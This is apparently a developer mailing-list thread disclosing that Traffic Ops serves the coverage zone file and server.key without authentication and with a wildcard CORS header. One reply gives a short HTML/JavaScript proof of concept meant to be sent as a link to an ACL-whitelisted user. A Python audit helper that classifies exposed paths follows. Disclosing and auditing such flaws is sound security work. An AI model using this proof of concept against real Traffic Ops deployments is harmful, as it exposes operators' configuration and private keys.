Sorry for bringing this thread back from the dead, but I think that it is still exploitable.

Even if ops is protected by an ACL, an attacker could use JS code to access it on behalf of a user who has access to ops. I've made a proof of concept to show that an attacker can fetch the CZF file from ops. This is possible both because the resource requires no authentication and because ops returns "Access-Control-Allow-Origin: *", which allows any host to gain access to these resources.

To try it yourself, paste the following content into an HTML file and open it in your browser. You should change "ops-host" to your ops hostname. To exploit this, an attacker should send a link with this code to someone who is whitelisted in the ACL.

    <html>
    <body>
    <script>
    // Resource that Traffic Ops serves without authentication
    var czfUrl = "https://ops-host/coverage-zone.json";

    // Cross-origin GET; the browser lets the page read the response
    // because it carries "Access-Control-Allow-Origin: *"
    function loadDoc(url, divId) {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          document.getElementById(divId).innerHTML = this.responseText;
        }
      };
      xhttp.open("GET", url, true);
      xhttp.send();
    }

    loadDoc(czfUrl, "czf");
    </script>
    <div id="czf"></div>
    </body>
    </html>

*---*
*Nir Ichye*
Qwilt | Work: +972-72-2221675 | Mobile: +972-54-7630105 | [email protected]

On Tue, Sep 19, 2017 at 4:55 PM Dave Neuman <[email protected]> wrote:

> Anything in the "public" directory is made public so that other components
> (like Traffic Router) can get to it without authentication.
> It is recommended that you have some ACLs in front of Traffic Ops to limit
> who/what can access it.
>
> On Tue, Sep 19, 2017 at 1:52 AM, Nir Ichye <[email protected]> wrote:
>
> > Hi,
> >
> > It seems that several files in TO can be accessed without credentials. This
> > includes:
> > - Coverage Zone File (http[s]://<opsDomain>/routing/coverage-zone.json)
> > - server.key (http[s]://<opsDomain>/routing/server.key)
> > - and other files in the public folder.
> >
> > Can you tell if the files are public on purpose and if this could be a
> > security issue?
> >
> > Thanks,
> > Nir.
> >
>
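As an added example, not from the thread or from Traffic Control itself: a small Python audit helper that encodes the condition Nir describes, so a defender can classify each "public" path from the result of an anonymous GET. A 200 without credentials plus "Access-Control-Allow-Origin: *" means a page on any origin can read the body from a whitelisted user's browser, which is why an IP ACL alone is not a fix; the sample responses below are constructed and the /api path is a placeholder.

```python
"""Added audit helper (not Apache Traffic Control code). For a Traffic Ops
path fetched with NO credentials, decide whether a script on an unrelated
website could read it from the browser of a user who is inside the ACL."""

def _header(headers, name):
    """Case-insensitive header lookup; None when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value.strip()
    return None

def classify(status, headers):
    """Verdict for one credential-less response.
    'cross-origin-readable': 200 without credentials AND ACAO '*', so any
      page a whitelisted user visits can fetch the body; an IP ACL in front
      of Ops does not help. 'same-origin-only': public body but no ACAO,
      so a page on another origin cannot read it. 'allowed-origin:<o>':
      readable only from that origin. Server-to-server fetches (e.g.
      Traffic Router) never go through CORS, so a wildcard is not needed."""
    if status in (401, 403):
        return "auth-required"
    if status != 200:
        return "not-exposed"
    acao = _header(headers, "Access-Control-Allow-Origin")
    if acao is None:
        return "same-origin-only"
    if acao == "*":
        return "cross-origin-readable"
    return "allowed-origin:" + acao

def audit(responses):
    """responses: path -> (status, headers) captured from anonymous GETs."""
    return {p: classify(s, h) for p, (s, h) in responses.items()}

def exposed_paths(responses):
    """Paths an off-site page could read on behalf of a whitelisted user."""
    return sorted(p for p, v in audit(responses).items()
                  if v == "cross-origin-readable")

# Constructed sample (header values made up): the two paths the thread names,
# served as the thread reports, plus a file without CORS headers and a
# placeholder endpoint that demands authentication.
SAMPLE = {
    "/routing/coverage-zone.json": (200, {"Access-Control-Allow-Origin": "*"}),
    "/routing/server.key": (200, {"Access-Control-Allow-Origin": "*"}),
    "/routing/other-public-file.txt": (200, {"Content-Type": "text/plain"}),
    "/api/<version>/placeholder": (401, {"WWW-Authenticate": "placeholder"}),
}
```

Feeding `audit` the real status and headers from an anonymous request to each path gives the per-path verdict; anything reported as cross-origin-readable needs either authentication or a non-wildcard allow-origin, not just an ACL.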
